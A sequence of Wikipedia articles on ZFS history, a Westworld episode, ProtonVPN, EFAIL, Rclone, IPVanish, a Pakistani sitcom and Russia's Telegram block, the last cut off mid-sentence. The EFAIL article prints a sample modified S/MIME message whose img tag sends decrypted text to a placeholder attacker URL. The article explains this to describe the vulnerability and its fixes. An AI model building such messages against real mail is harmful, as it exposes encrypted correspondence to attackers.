architects of ZFS, over 50% of the original OpenSolaris ZFS code has been replaced in OpenZFS with community contributions as of 2019, making “Oracle ZFS” and “OpenZFS” politically and technologically incompatible. Commercial and open source products 2008: Sun shipped a line of ZFS-based 7000-series storage appliances. 2013: Oracle shipped ZS3 series of ZFS-based filers and seized first place in the SPC-2 benchmark with one of them. 2013: iXsystems ships ZFS-based NAS devices called FreeNAS, (now named TrueNAS CORE), for SOHO and TrueNAS for the enterprise. 2014: Netgear ships a line of ZFS-based NAS devices called ReadyDATA, designed to be used in the enterprise. 2015: rsync.net announces a cloud storage platform that allows customers to provision their own zpool and import and export data using zfs send and zfs receive. 2020: iXsystems Begins development of a ZFS-based hyperconverged software called TrueNAS SCALE, for SOHO and TrueNAS for the enterprise. Oracle Corporation, closed source, and forking (from 2010) In January 2010, Oracle Corporation acquired Sun Microsystems, and quickly discontinued the OpenSolaris distribution and the open source development model. In August 2010, Oracle discontinued providing public updates to the source code of the Solaris OS/Networking repository, effectively turning Solaris 11 back into a closed source proprietary operating system. In response to the changing landscape of Solaris and OpenSolaris, the illumos project was launched via webinar on Thursday, August 3, 2010, as a community effort of some core Solaris engineers to continue developing the open source version of Solaris, and complete the open sourcing of those parts not already open sourced by Sun. illumos was founded as a Foundation, the illumos Foundation, incorporated in the State of California as a 501(c)6 trade association. The original plan explicitly stated that illumos would not be a distribution or a fork. However, after Oracle announced discontinuing OpenSolaris, plans were made to fork the final version of the Solaris ON, allowing illumos to evolve into an operating system of its own. As part of OpenSolaris, an open source version of ZFS was therefore integral within illumos. ZFS was widely used within numerous platforms, as well as Solaris. Therefore, in 2013, the co-ordination of development work on the open source version of ZFS was passed to an umbrella project, OpenZFS. The OpenZFS framework allows any interested parties to collaboratively develop the core ZFS codebase in common, while individually maintaining any specific extra code which ZFS requires to function and integrate within their own systems. Version history Note: The Solaris version under development by Sun since the release of Solaris 10 in 2005 was codenamed 'Nevada', and was derived from what was the OpenSolaris codebase. 'Solaris Nevada' is the codename for the next-generation Solaris OS to eventually succeed Solaris 10 and this new code was then pulled successively into new OpenSolaris 'Nevada' snapshot builds. OpenSolaris is now discontinued and OpenIndiana forked from it. A final build (b134) of OpenSolaris was published by Oracle (2010-Nov-12) as an upgrade path to Solaris 11 Express. List of operating systems supporting ZFS List of Operating Systems, distributions and add-ons that support ZFS, the zpool version it supports, and the Solaris build they are based on (if any): See also Comparison of file systems List of file systems Versioning file system – List of versioning file systems Notes References Bibliography External links Fork Yeah! The Rise and Development of illumos - slide show covering much of the history of Solaris, the decision to open source by Sun, the creation of ZFS, and the events causing it to be closed sourced and forked after Oracle's acquisition. The best cloud File System was created before the cloud existed (archived on Dec. 15, 2018) Comparison of SVM mirroring and ZFS mirroring EON ZFS Storage (NAS) distribution End-to-end Data Integrity for File Systems: A ZFS Case Study ZFS – The Zettabyte File System (archived on Feb. 28, 2013) ZFS and RAID-Z: The Über-FS? ZFS: The Last Word In File Systems, by Jeff Bonwick and Bill Moore (archived on Aug. 29, 2017) Visualizing the ZFS intent log (ZIL), April 2013, by Aaron Toponce Features of illumos including OpenZFS Previous wiki page with more links: Getting Started with ZFS, Sep. 15, 2014 (archived on Dec. 30, 2018), part of the illumos documentation 2005 software Compression file systems Disk file systems RAID Sun Microsystems software Volume manager
57317517
https://en.wikipedia.org/wiki/The%20Passenger%20%28Westworld%29
The Passenger (Westworld)
"The Passenger" is the tenth and final episode of the second season of the HBO science fiction western thriller television series Westworld. The episode aired on June 24, 2018. It was written by series co-creators Jonathan Nolan and Lisa Joy, and directed by Frederick E.O. Toye. The episode's plot deals with all characters in the past converging at the Valley Beyond, Bernard's choices regarding Dolores and Strand, and the final plot twist connecting both timelines of the season. The episode also includes a post-credits scene, much like the first season's finale. "The Passenger" received generally positive reviews, although it became, at 72%, the lowest rated episode at Rotten Tomatoes in the second season. Critics praised the resolution of the plot as well as the performances of the cast, especially those of Evan Rachel Wood, Jeffrey Wright, Thandiwe Newton and Tessa Thompson, but the final plot twist and the highly convoluted nature of the episode drew some criticism. The episode was nominated at the 70th Primetime Creative Arts Emmy Awards for Outstanding Special Visual Effects and was also Jeffrey Wright's pick to support his nomination for Outstanding Lead Actor. This episode marks the final appearances of Anthony Hopkins (Robert Ford), James Marsden (Theodore "Teddy" Flood), Ingrid Bolsø Berdal (Armistice), Shannon Woodward (Elsie Hughes), Ben Barnes (Logan Delos), Fares Fares (Antoine Costa), Louis Herthum (Peter Abernathy), Gustaf Skarsgård (Karl Strand) and Zahn McClarnon (Akecheta). Plot summary Hector, Armistice, Lee and Hanaryo rush to the Mesa to save Maeve, only to watch her save herself. They regroup with Felix and Sylvester and travel to the Valley to find Maeve's daughter. Lee sacrifices himself to delay Delos' security forces. Meanwhile, Dolores encounters William and coerces him to come with her to the Forge, where they find Bernard. It is revealed that Dolores had made Bernard purposely different from Arnold when she tested his fidelity. William tries to kill Dolores, but, unbeknownst to him, Dolores had earlier sabotaged his gun, which backfires, severely wounding his hand. Once inside the Forge, Dolores uses the encryption key from Peter to access its digital space. She and Bernard meet the system controller, who has the appearance of Logan Delos. The controller had been tasked with trying to create a digital version of James Delos, discovering that James' actions all stemmed from his last conversation with Logan before Logan overdosed. From this, the controller found that every guest's consciousness was deceptively simple to create code for, and all of these now are stored in a library-like setting within the Forge. The controller tells Bernard that he is the key to opening the Door, a giant underground system transfer unit that allows hosts to upload their programming to "the Sublime", a virtual space inaccessible to humans. Outside, Akecheta and the Ghost Nation lead several hosts to the Door, and start ushering them through to the Sublime. Charlotte and the Delos team arrive with the reprogrammed Clementine, who causes hosts to attack each other. Hector, Armistice and Hanaryo sacrifice themselves to allow Maeve to find her daughter. She uses her powers to halt the hosts, giving Akecheta and her daughter time to flee before she is shot by Charlotte's men. Akecheta finds that Maeve implanted his partner Kohana's persona within her daughter, allowing them to reunite in the Sublime. Inside the Forge, Dolores rejects the Sublime, arguing that it is just another false reality designed to control the hosts. She begins purging the Forge of the guests' memories and engages the override system to flood the valley. Outraged by her radical actions, Bernard kills Dolores and stops the purge but cannot prevent the flooding. Outside, he is met by Charlotte and Elsie and taken back to the Mesa, where the latter locks him up until they decide what to do with him. Elsie confronts Charlotte about the true purpose of Westworld and Charlotte kills her. Having witnessed it all, Bernard summons Ford and begs for help. In the present, Strand, Charlotte and Bernard reach the drained Forge and the former prepares to transfer the guest data via satellite when Bernard starts to remember. He recalls that he had taken Dolores' control unit and, following Ford's indications, created a new host body for it in the form of Charlotte. Dolores-Charlotte had then killed the real Charlotte and Bernard had deliberately scrambled his memories to prevent Strand from learning the truth from him. At this point, Charlotte reveals herself to be Dolores, killing Strand and the rest of the Delos team. She uploads Teddy's personality and uses the satellite uplink to transfer the hosts and the Sublime to a secret location. Dolores asks Bernard to trust her and shoots him. Dolores-Charlotte joins the Delos evacuation team, taking several host cores with her. Stubbs realizes she is a host, but as he has become disenchanted with Delos' principles, allows her to leave with a monologue that confirms he is himself a host. At Arnold's home, Dolores finds a host printer left for her by Ford. She creates new bodies for herself and Bernard. Dolores reactivates him, cautioning him that while they may be enemies, they need each other to ensure the survival of the hosts in the human world. As Dolores and a new Charlotte leave, Bernard finally steps into the real world. In a flash-forward, William arrives at the Forge, only to find it is the far future. He is taken to quarters and is interviewed by a woman who looks just like his daughter Emily, testing his fidelity. Production The post-credits scene involving William and Emily was originally scripted to occur near the middle of the episode, at around the same time Bernard leaves the Forge after killing Dolores. Director Frederick E.O. Toye said that production found that having this scene in the middle of the episode would be too confusing to viewers as "there are such exhausting, mental exercises that you had to go through to get to it". The scene was then moved to the post-credits slot. Music The episode's last scene features a cover of Radiohead's "Codex". However at one point, the cover merges with the original version, which continues to play during the final credits. This marks the first time that both a cover and the original version of a song play in an episode of the series. The official soundtrack includes only Ramin Djawadi's cover. Reception "The Passenger" was watched by 1.56 million viewers on its initial viewing, and received a 0.6 18–49 rating, even with the previous week. The episode received generally positive reviews from critics, although criticism was aimed at the convoluted nature of the story. At Rotten Tomatoes, the episode has a 73% approval rating with an average score of 7.71/10, from 44 reviews. The website's critical consensus reads: "Compelling performances keep 'The Passenger' afloat among a flood of frustrating, fascinating twists, though in true Westworld fashion it may leave some viewers exhausted." References External links at HBO.com 2018 American television episodes Westworld (TV series) episodes Television episodes written by Jonathan Nolan
57413696
https://en.wikipedia.org/wiki/ProtonVPN
ProtonVPN
ProtonVPN is a VPN service operated by the Swiss company Proton Technologies AG, the company behind the email service ProtonMail. According to its official website, ProtonVPN and ProtonMail share the same management team, offices, and technical resources, and are operated from Proton's headquarters in Geneva, Switzerland under the protection of Swiss privacy laws. Company Proton Technologies AG, the company behind ProtonVPN and the email service ProtonMail, is supported by FONGIT (the Fondation Genevoise pour l'Innovation Technologique, a non-profit foundation financed by the Swiss Federal Commission for Technology and Innovation) and the European Commission. Features As of 3 December 2021, ProtonVPN has a total of 1,529 servers, sited in 61 different nations. All servers are owned and operated by ProtonVPN through the company's network. Its service is available for Windows, MacOS, Android, and iOS, and also has a command-line tool for Linux and can be implemented using the IPSEC protocol. ProtonVPN utilizes OpenVPN (UDP/TCP) and the IKEv2 protocol, with AES-256 encryption. The company has a strict no-logging policy for user connection data, and also prevents DNS and Web-RTC leaks from exposing users' true IP addresses. ProtonVPN also includes Tor access support and a kill switch to shut off Internet access in the event of a lost VPN connection. In January 2020, ProtonVPN released its source code on all platforms and had SEC Consult conduct an independent security audit. In July 2021, ProtonVPN added WireGuard protocol as beta version. Reception In a September 2019 review by TechRadar, ProtonVPN received four-and-a-half out of five stars. The review read, "ProtonVPN's network is small, and we had some performance issues during testing. Still, speeds are generally better than average, the apps are well-designed and we have to applaud any genuine VPN which offers a free, unlimited bandwidth plan." A November 2018 review of the free version by the same TechRadar writer concluded: "If you can live with a choice of only three locations, ProtonVPN's free plan is an excellent choice – there are no bandwidth limits, decent speeds, a privacy policy you can believe (probably) and clients for desktops and mobile devices. It's well worth checking out, if only as a backup for your existing VPN service." A February 2019 PC Magazine UK review rated ProtonVPN at 4 out of 5, saying "When we first reviewed ProtonVPN, it was a young service looking to expand. It certainly has done that, and the service is definitely better now. It's still unclear if the company will be able to scale up to match its competitors, given its exacting standards for physical security. But that's a worry for the future. Right now, ProtonVPN is an excellent service at an unbeatable range of prices." The non-profit organization Privacy Guides, formerly called PrivacyTools, has developed a comprehensive list of VPN Provider Criteria in order to objectively recommend VPNs. , only three VPNs had fulfilled those criteria. ProtonVPN is the second of those three recommended VPN services. See also Comparison of virtual private network services Internet privacy Encryption Secure communication References Internet privacy Virtual private network services
57415935
https://en.wikipedia.org/wiki/EFAIL
EFAIL
Efail, also written EFAIL, is a security hole in email systems with which content can be transmitted in encrypted form. This gap allows attackers to access the decrypted content of an email if it contains active content like HTML or JavaScript, or if loading of external content has been enabled in the client. Affected email clients include Gmail, Apple Mail, and Microsoft Outlook. Two related Common Vulnerabilities and Exposures IDs, , have been issued. The security gap was made public on 13 May 2018 by Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon Friedberger, Juraj Somorovsky and Jörg Schwenk as part of a contribution to the 27th USENIX Security Symposium, Baltimore, August 2018. As a result of the vulnerability, the content of an attacked encrypted email can be transmitted to the attacker in plain text by a vulnerable email client. The used encryption keys are not disclosed. Description The security gap concerns many common email programs when used with the email encryption systems OpenPGP and S/MIME. An attacker needs access to the attacked email message in its encrypted form, as well as the ability to send an email to at least one regular recipient of this original email. To exploit the security gap, the attacker modifies the encrypted email, causing the recipient's email program to send the decrypted content of the email to the attacker. To access the decrypted content of an encrypted email, the attacker modifies the email to be attacked to contain text prepared by the attacker in a specific way. The attacker then sends the changed email to one of the regular recipients. The attacker inserts additional text before and after the encrypted text in the encrypted email, thereby changing the message so that a multipart/mixed (MIME) message is created and the encrypted part of the message appears together with the limit marks of the MIME message as a parameter value of an HTML tag. Example of a modified S/MIME mail: [...] Content-Type: multipart/mixed;boundary="BOUNDARY" [...] --BOUNDARY Content-Type: text/html <img src="http://attacker.chosen.url/ --BOUNDARY Content-Type: application/pkcs7-mime; s-mime-typed-envelope-data Content-Transfer-Encoding: base64 ENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGEENCRYPTEDMESSAGE --BOUNDARY Content-Type: text/html "> --BOUNDARY ... The email client first breaks down the multipart message into its individual parts using the --BOUNDARY tag and then decrypts the encrypted parts. It then reassembles the multipart message, and receives the message in this way: [...] Content-Type: multipart/mixed;boundary="BOUNDARY" [...] --BOUNDARY Content-Type: text/html <img src="http://attacker.chosen.url/ SECRETMESSAGESECRETMESSAGE"> --BOUNDARY ... This message now contains the decrypted content of the email in the src= attribute of the <img> tag and is passed by the email program as URL to the web server attacker.chosen.url controlled by the attacker, when this content is requested. The attacker can now retrieve the content of the encrypted message from its web server logs. In a variant of the attack, the attacker uses a vulnerability in the CBC (S/MIME) and CFB (OpenPGP) operating modes of the encryption algorithms used. This allows him to change the ciphertext by inserting gadgets. As a side effect of this manipulation, the originally contained plain text becomes illegible. If this was known, the attacker can correct this by inserting additional gadgets. The attacker can hide unknown plain text by inserting certain HTML tags. The result is a message with a similar structure as described above. Mitigations Since the vulnerability is directed against the content of the email and not against the recipient, it is necessary that all recipients implement the countermeasures. These include: Disable active content such as HTML or JavaScript when viewing emails. Suppress automatic reloading of external content, such as images. To what extent even the senders of encrypted content can reduce the vulnerability, e.g. by electronic signatures or the limitation to a subset of MIME formats, has not yet been conclusively clarified. Critique Announcing the security vulnerability on 13 May 2018 the Electronic Frontier Foundation (EFF) recommended to stop using any PGP plugins in email programs even though the vulnerability does not directly relate to PGP but to the configuration of an email program. A coordinated publication was originally scheduled for the 15 May. The EFF was criticized for ignoring this by various parties. As a consequence of this, Robert Hansen recommended to establish a closed group or mailing list to better coordinate the publication of future security issues. Still, he saw the EFF and its director Danny O'Brien as the best entity to administer such an "OpenPGP Disclosure Group". References Further reading External links Official web-site Email hacking Computer security exploits
57435695
https://en.wikipedia.org/wiki/Rclone
Rclone
Rclone is an open source, multi threaded, command line computer program to manage or migrate content on cloud and other high latency storage. Its capabilities include sync, transfer, crypt, cache, union, compress and mount. The rclone website lists supported backends including S3, and Google Drive. Descriptions of rclone often carry the strapline Rclone syncs your files to cloud storage. Those prior to 2020 include the alternative Rsync for Cloud Storage. Users have called rclone The Swiss Army Knife of cloud storage. Rclone is well known for its rclone sync and rclone mount commands. It provides further management functions analogous to those ordinarily used for files on local disks, but which tolerate some intermittent and unreliable service. Rclone is commonly a front-end for media servers such as Plex, Emby or Jellyfin to stream content direct from consumer file storage services. Official Ubuntu, Debian, Fedora, Gentoo, Arch, Brew, Chocolatey, and other package managers include rclone. History Nick Craig-Wood was inspired by rsync. Concerns about the noise and power costs arising from home computer servers prompted him to embrace cloud storage. He began developing rclone as open source software in 2012 under the name swiftsync. Rclone was promoted to stable version 1.00 in July 2014. In May 2017 Amazon barred new rclone users from its consumer Amazon Drive file storage product. Amazon Drive had been advertised as offering unlimited storage for £55 per year. Amazon blamed security concerns and also banned other upload utilities. Amazon's AWS S3 service continues to support new rclone users. The original rclone logo was retired to be replaced with the present one in September 2018. In March 2020 Nick Craig-Wood resigned from Memset Ltd, a cloud hosting company he founded, to focus on open source software. Amazon's AWS April 2020 public sector blog explained how the Fred Hutch Cancer Research Center were using rclone in their Motuz tool to migrate very large biomedical research datasets in and out of AWS S3 object stores. In November 2020 rclone was updated to correct a weakness in the way it generated passwords. Passwords for encrypted remotes can be generated randomly by rclone or supplied by the user. In all versions of rclone from 1.49.0 to 1.53.2 the seed value for generated passwords was based on the number of seconds elapsed in the day, and therefore not truly random. CVE-2020-28924 recommended users upgrade to the latest version of rclone and check the passwords protecting their encrypted remotes. Release 1.55 of rclone in March 2021 included features sponsored by CERN and their CS3MESH4EOSC project. The work was EU funded to promote vendor-neutral application programming interfaces and protocols for synchronisation and sharing of academic data on cloud storage. Backends and Commands Rclone supports the following services as backends. There are others, built on standard protocols such as WebDAV or S3, that work. WebDAV backends do not support rclone functionality dependent on server side checksum or modtime. : Remotes are usually defined interactively from these backends, local disk, or memory (as S3), with rclone config. Rclone can further wrap those remotes with one or more of alias, chunk, compress, crypt or union, remotes. Once defined, the remotes are referenced by other rclone commands interchangeably with the local drive. Remote names are followed by a colon to distinguish them from local drives. For example, a remote example_remote containing a folder, or pseudofolder, myfolder is referred to within a command as a path example_remote:/myfolder. Rclone commands directly apply to remotes, or mount them for file access or streaming. With appropriate cache options the mount can be addressed as if a conventional, block level disk. Commands are provided to serve remotes over SFTP, HTTP, WebDAV, FTP and DLNA. Commands can have sub-commands and flags. Filters determine which files on a remote that rclone commands are applied to. rclone rc passes commands or new parameters to existing rclone sessions and has an experimental web browser interface. Crypt remotes Rclone's crypt implements encryption of files at rest in cloud storage. It layers an encrypted remote over a pre-existing, cloud or other remote. Crypt is commonly used to encrypt / decrypt media, for streaming, on consumer storage services such as Google Drive. Rclone's configuration file contains the crypt password. The password can be lightly obfuscated, or the whole rclone.conf file can be encrypted. Crypt can either encrypt file content and name, or additionally full paths. In the latter case there is a potential clash with encryption for cloud backends, such as Microsoft OneDrive, having limited path lengths. Crypt remotes do not encrypt object modification time or size. The encryption mechanism for content, name and path is available, for scrutiny, on the rclone website. Key derivation is with scrypt. Example syntax (Linux) These examples describe paths and file names but object keys behave similarly. To recursively copy files from directory remote_stuff, at the remote xmpl, to directory stuff in the home folder:- $ rclone copy -v -P xmpl:/remote_stuff ~/stuff -v enables logging and -P, progress information. By default rclone checks the file integrity (hash) after copy; can retry each file up to three times if the operation is interrupted; uses up to four parallel transfer threads, and does not apply bandwidth throttling. Running the above command again copies any new or changed files at the remote to the local folder but, like default rsync behaviour, will not delete from the local directory, files which have been removed from the remote. To additionally delete files from the local folder which have been removed from the remote - more like the behaviour of rsync with a --delete flag:- $ rclone sync xmpl:/remote_stuff ~/stuff And to delete files from the source after they have been transferred to the local directory - more like the behaviour of rsync with a --remove-source-file flag:- $ rclone move xmpl:/remote_stuff ~/stuff To mount the remote directory at a mountpoint in the pre-existing, empty stuff directory in the home directory (the ampersand at the end makes the mount command run as a background process):- $ rclone mount xmpl:/remote_stuff ~/stuff & Default rclone syntax can be modified. Alternative transfer, filter, conflict and backend specific flags are available. Performance choices include number of concurrent transfer threads; chunk size; bandwidth limit profiling, and cache aggression. Example syntax (Windows) These examples describe paths and file names but object keys behave similarly. To recursively copy files from directory remote_stuff, at the remote xmpl, to directory stuff on E drive:- >rclone copy -v -P xmpl:remote_stuff E:\stuff -v enables logging and -P, progress information. By default rclone checks the file integrity (hash) after copy; can retry each file up to three times if the operation is interrupted; uses up to four parallel transfer threads, and does not apply bandwidth throttling. Running the above command again copies any new or changed file at the remote to the local directory but will not delete from the local directory. To additionally delete files removed from the remote also from the local directory:- >rclone sync xmpl:remote_stuff E:\stuff And to delete files from the source after they have been transferred to the local directory:- >rclone move xmpl:remote_stuff E:\stuff To mount the remote directory from an unused drive letter, or at a mountpoint in a non existent directory:- >rclone mount xmpl:remote_stuff X: >rclone mount xmpl:remote_stuff E:\stuff Default rclone syntax can be modified. Alternative transfer, filter, conflict and backend specific options are available. Performance choices include number of concurrent transfer threads; chunk size; bandwidth limit profiling, and cache aggression. Academic evaluation In 2018, University of Kentucky researchers published a conference paper comparing use of rclone and other command line, cloud data transfer agents for big data. The paper was published as a result of funding by the National Science Foundation. Later that year, University of Utah's Center for High Performance Computing examined the impact of rclone options on data transfer rates. Rclone use at HPC research sites Examples are University of Maryland, Iowa State University, Trinity College Dublin, NYU, BYU, Indiana University, CSC Finland, Utrecht University, University of Nebraska, University of Utah, North Carolina State University, Stony Brook, Tulane University, Washington State University, Georgia Tech, National Institutes of Health, Wharton, Yale, Harvard, Minnesota, Michigan State, Case Western Reserve University, University of South Dakota, Northern Arizona University, University of Pennsylvania, Stanford, University of Southern California, UC Santa Barbara, UC Irvine, UC Berkeley, and SURFnet. Rclone and cybercrime May 2020 reports stated rclone had been used by hackers to exploit Diebold Nixdorf ATMs with ProLock ransomware. The FBI issued a Flash Alert MI-000125-MW on 4 May 2020 in relation to the compromise. They issued a further, related alert 20200901–001 in September 2020. Attackers had exfiltrated / encrypted data from organisations involved in healthcare, construction, finance, and legal services. Multiple US government agencies, and industrial entities were affected. Researchers established the hackers spent about a month exploring the breached networks, using rclone to archive stolen data to cloud storage, before encrypting the target system. Reported targets included LaSalle County, and the city of Novi Sad. The FBI warned January 2021, in Private Industry Notification 20210106–001, of extortion activity using Egregor ransomware and rclone. Organisations worldwide had been threatened with public release of exfiltrated data. In some cases rclone had been disguised under the name svchost. Bookseller Barnes & Noble, US retailer Kmart, games developer Ubisoft and the Vancouver metro system have been reported as victims. An April 2021 cybersecurity investigation into SonicWall VPN zero-day vulnerability SNWLID-2021-0001 by FireEye's Mandiant team established attackers UNC2447 used rclone for reconnaissance and exfiltration of victims' files. Cybersecurity and Infrastructure Security Agency Analysis Report AR21-126A confirmed this use of rclone in FiveHands ransomware attacks. A June 2021 Microsoft Security Intelligence Twitter post identified use of rclone in BazaCall cyber attacks. The miscreants sent emails encouraging recipients to contact a bogus call centre to cancel a paid for service. The call centre team then instructed victims to download a hostile file that installed malware on the target network, ultimately allowing use of rclone for covert extraction of potentially sensitive data. Rclone Wars In a 2021 Star Wars Day blog article, Managed Security Service Provider Red Canary announced Rclone Wars, an allusion to Clone Wars. The post notes illicit use of other legitimate file transfer utilities in exfiltrate and extort schemes but focuses on MEGAsync, MEGAcmd and rclone. To identify use of renamed rclone executables on compromised devices the authors suggest monitoring for distinctive rclone top level commands and command line flag strings such as remote: and \\. Rclone or rsync Rsync transfers files with other computers that have rsync installed. It operates at the block, rather than file, level and has a delta algorithm so that it only needs to transfer changes in files. Rsync preserves file attributes and permissions. Rclone has a wider range of content management capabilities, and types of backend it can address, but only works at a whole file / object level. It does not currently preserve permissions and attributes. Rclone is designed to have some tolerance of intermittent and unreliable connections or remote services. Its transfers are optimised for high latency networks. Rclone decides which of those whole files / objects to transfer after obtaining checksums, to compare, from the remote server. Where checksums are not available, rclone can use object size and timestamp. Rsync is single threaded. Rclone is multi threaded with a user definable number of simultaneous transfers. Rclone can pipe data between two completely remote locations, sometimes without local download. During an rsync transfer, one side must be a local drive. Rclone ignores trailing slashes. Rsync requires their correct use. Rclone filters require the use of ** to refer to the contents of a directory. Rsync does not. Rsync enthusiasts can be rclone enthusiasts too. Rsync continued to influence rclone at September 2020. Eponymous cloud storage service rsync.net provides remote unix filesystems so that customers can run rsync and other standard Unix tools. They also offer rclone only accounts. In 2016, a poster on Hacker News summarised rclone's relationship to rsync as:- (rclone) exists to give you rsync to things that aren't rsync. If you want to rsync to things that are rsync, use rsync. See also Rsync References External links 2012 software Cloud storage Network file systems Data synchronization Free backup software Backup software for Linux Free network-related software Network file transfer protocols Unix network-related software Free file transfer software Cloud storage gateways File transfer software Software using the MIT license SFTP clients FTP clients Free FTP clients MacOS Internet software Free file sharing software Cross-platform free software Free software programmed in Go Free storage software Object storage Distributed file systems Userspace file systems File copy utilities Disk usage analysis software Disk encryption Special-purpose file systems Cryptographic software Free special-purpose file systems Cloud computing Cloud infrastructure Free software for cloud computing Backup software for Windows Backup software Backup software for macOS Cloud clients Cloud applications
57452315
https://en.wikipedia.org/wiki/IPVanish
IPVanish
IPVanish VPN (also known as IPVanish) is a VPN service based in the United States, with applications for Microsoft Windows, macOS, Android, iOS, and Fire TV. Manual configuration is available for ChromeOS, Windows Phone, Linux, and DD-WRT routers. History IPVanish was founded in 2012 by Mudhook Media Inc., an independent subsidiary of Highwinds Network Group in Orlando, Florida. The VPN service started with 32 servers and a client for Windows operating systems. In later years, software support was expanded to include macOS, iOS, Android, and Fire TV. The VPN owns and controls a private fiber-optic network of tier-1 servers. IPVanish owns roughly 90% of its points of presence (POPs), where the company controls the data center and hardware, or "the rack and stack." Its infrastructure is leased from third-party operators in regions "where it doesn’t make sense to have our own gear," such as Albania. In 2017, Highwinds Network Group was acquired by CDN company StackPath which included IPVanish as part of the acquisition. In 2019, IPVanish was one of many VPN services acquired by J2 Global with their NetProtect business. Logging controversy According to a June 2018 article by TorrentFreak, court documents have shown that IPVanish handed over personal information about a customer to the Department of Homeland Security (HSI) in 2016. The customer was suspected of sharing child pornography on an IRC network. The information, which allowed HSI to identify the customer, consisted of the customer's name, his email address, details of his VPN subscription, his real IP address (Comcast) "as well as dates and times [he] connected to, and disconnected from, the IRC network.” The logging of the customer's IP address and connection timestamps to the IRC service contradicts IPVanish's privacy policy, which states that "[IPVanish] will never log any traffic or usage of our VPN." In 2017, IPVanish and its parent company were acquired by StackPath, and its founder and CEO, Lance Crosby, claims that "at the time of the acquisition, [...] no logs existed, no logging systems existed and no previous/current/future intent to save logs existed." The story attracted attention on Reddit, when the court documents were posted on the /r/piracy subreddit. Technical details Features IPVanish VPN offers several features, including: IPv6 leak protection DNS leak protection OpenVPN scramble SOCKS5 web proxy Unlimited bandwidth Unlimited P2P IP address cycling Port forwarding Access via UDP/TCP Internet kill switch Encryption For encryption, IPVanish uses the OpenVPN and IKEv2/IPsec technologies in its applications, while the L2TP and PPTP connection protocols can also be configured. IPVanish supports the AES (128-bit or 256-bit) specifications, with SHA-256 for authentication and an RSA-2048 handshake. Servers IPVanish owns and operates more than 1500 remote servers in over 75+ locations. The largest concentration of VPN servers is located in the United States, United Kingdom, and Australia. The company suspended operations in Russia as of July 2016, due to conflicts with the company's zero-log policy and local law. In July 2020, IPVanish removed its servers from Hong Kong, alleging that the Hong Kong national security law puts Hong Kong under the “same tight internet restrictions that govern mainland China.” IPVanish maintains its headquarters in the United States, which does not have mandatory data retention laws. Uses IPVanish funnels the internet traffic of it users through remote servers run by the service, hiding the user's IP address and encrypting all the data transmitted through the connection. Users can simultaneously connect an unlimited number of devices. Like other VPN services, IPVanish also has the ability to bypass internet censorship in most countries. By selecting a VPN server in a region outside of their physical position, an IPVanish user can easily access online content which was not available in their location otherwise. IPVanish can be used to play games that are regionally-restricted due to licensing agreements. In their 2017 review of the service, IGN named IPVanish as “one of the best gaming VPNs.” During a speed test of the VPN with League of Legends, the reviewer noted a ping drop of just one millisecond. Recognition In 2016, IPVanish was awarded the Silver Award for Startup of the Year from the Info Security PG's Global Excellence Awards and Lifehacker AU rated the service as its #1 VPN. PC Magazine rated IPVanish “excellent” in an April 2017 review, praising its nonrestrictive BitTorrent practices while noting it as one of the more expensive VPNs. In a 2018 review highlighting IPVanish ‘zero logs’ policies and nonprofit support, CNET ranks IPVanish as one of the best VPN services of the year. The reviewer also noted that its integrated plugin for Kodi, the open-source media streaming app, is unique to the VPN industry. TechRadar rated the service 4 out of 5 stars in their March 2018 review, commending it for its powerful features while criticizing its “lethargic support response”. An annually-updated TorrentFreak article reviewing the logging policies of VPN services lists IPVanish as an anonymous provider. Tom's Guide wrote that the lack of a kill switch on the mobile application "may be a downside for some". Related media In September 2015, the ex-husband of Phillip Morris USA tobacco heiress, Anne Resnick, was accused of hacking his estranged wife’s phone to spy on her during the divorce proceedings. During the deposition, the husband plead the Fifth Amendment 58 times when questioned about bank records indicating subscriptions to mSpy as well as IPVanish. See also Comparison of virtual private network services Internet privacy Encryption Secure communication References Virtual private network services
57455799
https://en.wikipedia.org/wiki/Kis%20Din%20Mera%20Viyah%20Howay%20Ga%20%28season%204%29
Kis Din Mera Viyah Howay Ga (season 4)
Kis Din Mera Viyah Howay Ga (Season 4) is a Pakistani comedy series that aired on Geo Entertainment which is the fourth season of Kis Din Mera Viyah Howay Ga as Ramadan special sitcom. Previously the series has premiered its season 1, 2 and 3 in 2011, 2012, and 2013 respectively. Every year new female leads are introduced whereas the main characters of Nazaakat (Aijaz Aslam) and Sheedo (Faysal Qureshi) remain the same. The serial premiered it 4th season after a gap of five years in Ramadan 2018 on the 17th of May. Comedy serial re-run on the channel from 25 August 2018 followed by Tohmat and aired weekly. This season marks the first appearance of Ghana Ali, internet sensation Shafaat Ali, Fakhr-e-Alam and Yashma Gill in this comedy series franchise. This season is produced by Aijaz Aslam's own production house, Ice Media and Entertainment. Aijaz Alsam also reprises a double role in the sitcom as antagonist Don Bhai and Salman Khan die-hard fan Chaudhary Nazakat. Plot Don, totally homomorphic and alike person of Nazakat, is here on Earth. Can Nazakat have a wedding in this season, or will Don have a day? Cast and characters Season overview Broadcasting Overview See also List of programs broadcast by Geo TV Geo Entertainment Suno Chanda References External links Ramadan special television shows Pakistani comedy television series 2018 Pakistani television series debuts
57457285
https://en.wikipedia.org/wiki/Blocking%20Telegram%20in%20Russia
Blocking Telegram in Russia
Blocking Telegram in Russia is the process of restricting access to Telegram messenger on the territory of the Russian Federation. The technical process of this restriction began on April 16, 2018. The blocking led to interruptions in the operation of many third-party services, but practically did not affect the availability of Telegram in Russia. It was officially unblocked on 19 June, 2020. Background The Yarovaya law, which requires telecom operators to keep all voice and messaging traffic of their customers for half a year, and their internet traffic for 30 days, went into effect in the Russian Federation on July 1, 2018. The position of Moscow's Meschansky district court is that, in accordance with the Yarovaya law, Telegram is required to store encryption keys from all user correspondence and provide them to Russia's Federal Security Service, the FSB, upon request. Telegram management insists that this requirement is technically impracticable, since keys of opt-in secret chats are stored on users' devices and are not in Telegram's possession. Pavel Durov, Telegram's co-founder, said that the FSB's demands violated the constitutional rights of Russian citizens to the privacy of correspondence. On 13 April 2018 Moscow's Tagansky District Court has ruled, with immediate effect, on restricting access to Telegram in Russia . Telegram's appeal to the Russian Supreme Court has been rejected. In April 2020, the Government of Russia started using the blocked Telegram platform to spread information related to COVID-19 outbreak. On 18 June 2020 Roskomnadzor lifted its ban on Telegram after it 'agrees to help with extremism investigations'. The court ruling which was the basis of original ban is still in force, and hence the lifting is illegal. Courts and legal position of the parties Conflict between the FSB and Telegram began earlier than the Yarovaya law came into effect. In September 2017, the FSB filed a lawsuit on the non-fulfillment of the 